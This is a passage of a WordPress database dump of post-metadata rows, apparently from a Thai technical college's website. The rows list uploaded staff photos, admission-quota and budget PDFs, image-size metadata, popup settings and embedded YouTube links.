:\"keywords\";a:0:{}}}'),
(29756, 12158, '_wp_attached_file', '2018/01/ผอ..jpg'),
(29757, 12158, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1668;s:6:\"height\";i:2226;s:4:\"file\";s:19:\"2018/01/ผอ..jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"ผอ.-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"ผอ.-225x300.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"ผอ.-768x1025.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1025;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:20:\"ผอ.-767x1024.jpg\";s:5:\"width\";i:767;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:19:\"ผอ.-225x300.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(29766, 12161, '_wp_attached_file', '2018/01/รองจิ๋ง.jpg'),
(29767, 12161, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1668;s:6:\"height\";i:2226;s:4:\"file\";s:33:\"2018/01/รองจิ๋ง.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:33:\"รองจิ๋ง-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:33:\"รองจิ๋ง-225x300.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:34:\"รองจิ๋ง-768x1025.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1025;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:34:\"รองจิ๋ง-767x1024.jpg\";s:5:\"width\";i:767;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:33:\"รองจิ๋ง-225x300.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(29772, 12163, '_wp_attached_file', '2018/01/รองชรินทร์.jpg'),
(29773, 12163, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1668;s:6:\"height\";i:2226;s:4:\"file\";s:42:\"2018/01/รองชรินทร์.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:42:\"รองชรินทร์-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:42:\"รองชรินทร์-225x300.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:43:\"รองชรินทร์-768x1025.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1025;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:43:\"รองชรินทร์-767x1024.jpg\";s:5:\"width\";i:767;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:42:\"รองชรินทร์-225x300.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(29774, 12164, '_wp_attached_file', '2018/01/รองชาคริต.jpg'),
(29775, 12164, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1668;s:6:\"height\";i:2226;s:4:\"file\";s:39:\"2018/01/รองชาคริต.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:39:\"รองชาคริต-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:39:\"รองชาคริต-225x300.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:40:\"รองชาคริต-768x1025.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1025;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:40:\"รองชาคริต-767x1024.jpg\";s:5:\"width\";i:767;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:39:\"รองชาคริต-225x300.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(29786, 12168, '_edit_lock', '1638437205:12'),
(29787, 12168, '_edit_last', '14'),
(29788, 12169, '_wp_attached_file', '2021/11/ประกาศรับโควตา2565.pdf'),
(29791, 12168, '_hide_featured', NULL),
(29794, 12171, '_wp_attached_file', '2021/07/ประกาศรายชื่อรอบโควตาปวชปวส.jpg'),
(29795, 12171, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:700;s:6:\"height\";i:300;s:4:\"file\";s:93:\"2021/07/ประกาศรายชื่อรอบโควตาปวชปวส.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:93:\"ประกาศรายชื่อรอบโควตาปวชปวส-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:93:\"ประกาศรายชื่อรอบโควตาปวชปวส-300x129.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:129;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:93:\"ประกาศรายชื่อรอบโควตาปวชปวส-400x171.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:171;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(29796, 12174, '_edit_lock', '1637223758:14'),
(29797, 12174, '_edit_last', '14'),
(29798, 12175, '_wp_attached_file', '2021/11/รายชื่อครูมีสิทธิ์สอบ.pdf'),
(29801, 12174, '_hide_featured', NULL),
(29806, 12177, '_wp_attached_file', '2021/11/รายชื่อมีสิทธิ์สอบ.pdf'),
(29813, 12181, '_edit_lock', '1637568855:14'),
(29814, 12181, '_edit_last', '14'),
(29815, 12182, '_wp_attached_file', '2021/11/20211112154158716.pdf'),
(29818, 12181, '_hide_featured', NULL),
(29821, 12184, '_edit_lock', '1636959818:14'),
(29822, 12184, '_edit_last', '14'),
(29823, 12185, '_wp_attached_file', '2021/11/Untitled-6.jpg'),
(29824, 12185, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:22:\"2021/11/Untitled-6.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"Untitled-6-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"Untitled-6-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"Untitled-6-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:23:\"Untitled-6-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:22:\"Untitled-6-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(29825, 12184, '_thumbnail_id', '12185'),
(29828, 12184, '_hide_featured', NULL),
(29833, 12189, '_edit_lock', '1637223901:14'),
(29834, 12189, '_edit_last', '14'),
(29835, 12190, '_wp_attached_file', '2021/11/ผลสอบครูจ้าง.pdf'),
(29838, 12189, '_hide_featured', NULL),
(29845, 12193, '_edit_lock', '1637568879:14'),
(29846, 12193, '_edit_last', '14'),
(29847, 12194, '_wp_attached_file', '2021/11/20211122150312960.pdf'),
(29850, 12193, '_hide_featured', NULL),
(29855, 12196, '_edit_lock', '1637568950:14'),
(29856, 12196, '_edit_last', '14'),
(29857, 12197, '_wp_attached_file', '2021/11/ประกาศรับเจ้าหน้าที่-พ.ย.64.pdf'),
(29860, 12196, '_hide_featured', NULL),
(29865, 12199, '_edit_lock', '1639966884:14'),
(29866, 12199, '_edit_last', '14'),
(29867, 12199, '_hide_featured', NULL),
(29868, 12202, '_wp_attached_file', '2021/11/รูปเล่มแผนงบประมาณ-2565.pdf'),
(29869, 12203, '_wp_attached_file', '2021/11/รูปเล่มแผนงบประมาณ-2565-1.pdf'),
(29870, 12215, 'data_version', '3'),
(29871, 12215, 'popup_open_count', '59312'),
(29872, 12215, '_edit_lock', '1650962263:14'),
(29873, 12215, '_edit_last', '14'),
(29874, 12216, '_wp_attached_file', '2021/12/1.png'),
(29875, 12216, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:937;s:6:\"height\";i:1319;s:4:\"file\";s:13:\"2021/12/1.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:13:\"1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:13:\"1-213x300.png\";s:5:\"width\";i:213;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:14:\"1-768x1081.png\";s:5:\"width\";i:768;s:6:\"height\";i:1081;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:14:\"1-727x1024.png\";s:5:\"width\";i:727;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:13:\"1-213x300.png\";s:5:\"width\";i:213;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(29876, 12216, '_cg_img_link', 'https://drive.google.com/drive/folders/1VSb8jlgifJ2YOO1ZVb_ga_lItNlhDFwn?usp=sharing'),
(29877, 12216, '_cg_link_target', '_self'),
(29878, 12215, '_hide_featured', '1'),
(29879, 12215, 'popup_title', ''),
(29880, 12215, 'popup_settings', 'a:35:{s:17:\"disable_on_mobile\";b:0;s:17:\"disable_on_tablet\";b:0;s:18:\"custom_height_auto\";b:0;s:18:\"scrollable_content\";b:0;s:21:\"position_from_trigger\";b:0;s:14:\"position_fixed\";b:0;s:16:\"overlay_disabled\";b:0;s:9:\"stackable\";b:0;s:18:\"disable_reposition\";b:0;s:22:\"close_on_overlay_click\";b:0;s:18:\"close_on_esc_press\";b:0;s:17:\"close_on_f4_press\";b:0;s:19:\"disable_form_reopen\";b:0;s:21:\"disable_accessibility\";b:0;s:8:\"triggers\";a:1:{i:0;a:2:{s:4:\"type\";s:9:\"auto_open\";s:8:\"settings\";a:2:{s:11:\"cookie_name\";s:0:\"\";s:5:\"delay\";s:3:\"500\";}}}s:10:\"conditions\";a:1:{i:0;a:1:{i:0;a:1:{s:6:\"target\";s:13:\"is_front_page\";}}}s:8:\"theme_id\";s:3:\"899\";s:4:\"size\";s:6:\"medium\";s:20:\"responsive_min_width\";s:2:\"0%\";s:20:\"responsive_max_width\";s:4:\"100%\";s:12:\"custom_width\";s:5:\"640px\";s:13:\"custom_height\";s:5:\"380px\";s:14:\"animation_type\";s:4:\"fade\";s:15:\"animation_speed\";s:3:\"350\";s:16:\"animation_origin\";s:10:\"center top\";s:8:\"location\";s:10:\"center top\";s:12:\"position_top\";s:3:\"100\";s:15:\"position_bottom\";s:1:\"0\";s:13:\"position_left\";s:1:\"0\";s:14:\"position_right\";s:1:\"0\";s:6:\"zindex\";s:10:\"1999999999\";s:10:\"close_text\";s:0:\"\";s:18:\"close_button_delay\";s:3:\"100\";s:7:\"cookies\";a:0:{}s:10:\"theme_slug\";s:8:\"lightbox\";}'),
(29881, 12215, 'popup_open_count_total', '130951'),
(29882, 12215, 'popup_last_opened', '1651392359'),
(29886, 12220, '_wp_attached_file', '2021/12/โควต้าภายนอก-ใบสมัคร.pdf'),
(29887, 12221, '_wp_attached_file', '2021/12/โควตาภายใน-ใบสมัคร.pdf'),
(29888, 12222, '_edit_lock', '1638438594:12'),
(29889, 12222, '_edit_last', '12'),
(29890, 12223, '_wp_attached_file', '2021/12/โควต้าภายนอก-ใบสมัคร-1.pdf'),
(29894, 12226, '_edit_lock', '1638441969:14'),
(29895, 12226, '_edit_last', '14'),
(29896, 12227, '_wp_attached_file', '2021/12/20211202160444910.pdf'),
(29899, 12226, '_hide_featured', NULL),
(29902, 12230, '_edit_lock', '1638447116:14'),
(29903, 12230, '_edit_last', '14'),
(29904, 12231, '_wp_attached_file', '2021/12/20211202160529418.pdf'),
(29907, 12230, '_hide_featured', NULL),
(29910, 12233, '_wp_attached_file', '2021/12/ABE0B4FA-A0A1-45B4-908B-8C5298848431.png'),
(29911, 12233, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1587;s:6:\"height\";i:2245;s:4:\"file\";s:48:\"2021/12/ABE0B4FA-A0A1-45B4-908B-8C5298848431.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:48:\"ABE0B4FA-A0A1-45B4-908B-8C5298848431-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:48:\"ABE0B4FA-A0A1-45B4-908B-8C5298848431-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:49:\"ABE0B4FA-A0A1-45B4-908B-8C5298848431-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:49:\"ABE0B4FA-A0A1-45B4-908B-8C5298848431-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:48:\"ABE0B4FA-A0A1-45B4-908B-8C5298848431-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(29912, 12237, '_wp_attached_file', '2021/12/1638505124564.jpg'),
(29913, 12237, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1076;s:6:\"height\";i:1522;s:4:\"file\";s:25:\"2021/12/1638505124564.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"1638505124564-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"1638505124564-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"1638505124564-768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:26:\"1638505124564-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:25:\"1638505124564-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(29914, 12239, '_edit_lock', '1639036045:14'),
(29915, 12240, '_wp_attached_file', '2021/12/20211209103232615.pdf'),
(29916, 12239, '_edit_last', '14'),
(29919, 12239, '_hide_featured', NULL),
(29924, 12242, '_edit_lock', '1639043128:12'),
(29925, 12242, '_edit_last', '14'),
(29926, 12243, '_wp_attached_file', '2021/12/20211209150539753.pdf'),
(29929, 12242, '_hide_featured', NULL),
(29932, 12248, '_edit_lock', '1639043250:12'),
(29933, 12248, '_edit_last', '12'),
(29934, 12249, '_wp_attached_file', '2021/12/ประกาศวิทยาลัยเทคนิคระยอง.pdf'),
(29935, 12250, '_edit_lock', '1639043302:12'),
(29936, 12250, '_edit_last', '12'),
(29939, 12250, '_hide_featured', NULL),
(29942, 12258, '_edit_lock', '1639740660:1'),
(29943, 12258, '_edit_last', '1'),
(29944, 12259, '_wp_attached_file', '2021/12/Screenshot-246.png'),
(29945, 12259, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1366;s:6:\"height\";i:768;s:4:\"file\";s:26:\"2021/12/Screenshot-246.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"Screenshot-246-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"Screenshot-246-300x169.png\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"Screenshot-246-768x432.png\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:27:\"Screenshot-246-1024x576.png\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:26:\"Screenshot-246-400x225.png\";s:5:\"width\";i:400;s:6:\"height\";i:225;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(29946, 12258, '_hide_featured', NULL),
(29949, 12258, '_thumbnail_id', '12259'),
(29952, 12258, '_oembed_70d30c1845da5aa403d6ac1a33e94aa8', '<iframe width=\"640\" height=\"360\" src=\"https://www.youtube.com/embed/MVjmWyFojA8?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen></iframe>'),
(29953, 12258, '_oembed_time_70d30c1845da5aa403d6ac1a33e94aa8', '1639723165'),
(29956, 12258, '_oembed_18edcf76f2b74fefbba5d94676e3cc82', '<iframe width=\"1220\" height=\"686\" src=\"https://www.youtube.com/embed/MVjmWyFojA8?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen></iframe>'),
(29957, 12258, '_oembed_time_18edcf76f2b74fefbba5d94676e3cc82', '1639723215'),
(29958, 12258, '_cg_img_link', 'https://forms.gle/gb2vFRBfXx22sJdp9'),
(29959, 12258, '_cg_link_target', ''),
(29962, 12264, '_wp_attached_file', '2021/12/S__107216900.jpg'),
(29963, 12264, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:1080;s:4:\"file\";s:24:\"2021/12/S__107216900.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"S__107216900-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"S__107216900-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"S__107216900-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:25:\"S__107216900-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:24:\"S__107216900-400x225.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(29964, 12265, '_wp_attached_file', '2021/12/S__107241475.jpg'),
(29965, 12265, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:828;s:6:\"height\";i:586;s:4:\"file\";s:24:\"2021/12/S__107241475.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"S__107241475-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"S__107241475-300x212.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:212;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"S__107241475-768x544.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:544;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:24:\"S__107241475-400x283.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:283;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(29966, 12266, '_wp_attached_file', '2021/12/97244.jpg'),
(29967, 12266, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1080;s:6:\"height\";i:1510;s:4:\"file\";s:17:\"2021/12/97244.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"97244-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"97244-215x300.jpg\";s:5:\"width\";i:215;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:18:\"97244-768x1074.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1074;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:18:\"97244-732x1024.jpg\";s:5:\"width\";i:732;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:17:\"97244-215x300.jpg\";s:5:\"width\";i:215;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_